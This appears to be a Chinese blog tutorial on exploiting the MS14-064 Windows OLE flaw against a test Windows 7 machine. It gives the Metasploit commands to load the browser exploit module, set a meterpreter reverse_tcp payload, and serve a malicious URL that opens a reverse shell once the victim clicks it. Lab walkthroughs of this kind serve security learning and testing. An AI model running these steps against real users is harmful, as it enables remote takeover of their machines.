zoukankan      html  css  js  c++  java
  • MS14-064 漏洞测试入侵win7

    Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

    远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

    metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

    执行命令:

    msfconsole    //启动MSF

    search ms14   //搜索关键字

    use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

    set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

    如图:

    需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,

    所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

    所以我们这里测试受害的机器为windows7 32位.

    按照图中各个属性配置好后 执行exploit即可

    得到一个URL地址,复制到受害者机器(win7)测试

    当用户点击允许了后

    可以看见这边反弹了一个shell,接下里我们就可以随便玩了, 

     测试成功,结束。

  • 相关阅读:
    94. Binary Tree Inorder Traversal
    101. Symmetric Tree
    38. Count and Say
    28. Implement strStr()
    实训团队心得(1)
    探索性测试入门
    LC.278. First Bad Version
    Search in Unknown Sized Sorted Array
    LC.88. Merge Sorted Array
    LC.283.Move Zeroes
  • 原文地址:https://www.cnblogs.com/hkleak/p/5431423.html
Copyright © 2011-2022 走看看